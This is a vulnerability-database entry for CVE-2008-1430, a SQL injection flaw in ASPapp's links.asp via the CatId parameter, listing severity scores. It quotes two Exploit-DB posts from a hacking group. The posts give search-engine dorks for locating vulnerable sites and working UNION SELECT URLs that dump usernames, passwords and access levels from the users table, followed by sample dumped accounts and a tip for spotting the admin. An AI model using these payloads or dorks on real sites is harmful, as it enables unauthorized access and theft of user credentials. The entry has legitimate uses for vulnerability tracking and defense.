CVE-2008-1430
Published 2008-03-20
CVE-2008-1430: SQL injection vulnerability in links.asp in ASPapp allows remote attackers to execute arbitrary SQL commands via the CatId parameter.
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.93% (56.1th percentile)
No detection rules found.
Exploit-DB
ASPapp Knowledge Base - SQL Injection
exploitdb·2008-03-20
---
..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-------------------------Turkey------------------------------
-----------------www.Hayalet-hack.com------------------------
-----------------www.xcorpitx-hack.com-----------------------
ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
thanx- str0ke-D3ng3siz-pc faresi-s@b
Exploit-DB
ASPapp Knowledge Base - 'CatId' SQL Injection (1)
exploitdb·2008-03-19
---
..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##
-----------------Turkey--------------------------------------
--------- www.Hayalet-hack.com-------------------------------
----------www.xcorpitx-hack.com------------------------------
Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability
You'll see lots of users like this, but accesslevel will help you see the admin.
----------------example--------------------------------------
Links › guest › 12 › 1 user
Links › editor › editor › 2 moderator
Links › manager› manager› 2 moderator
Links › surco › surco › 2 moderator
Links › admin › admin › 3 admin
Links › ovivas › ovivas › 4 super-admin----- we'll log
No writeups or analysis indexed.
Published: 2008-03-20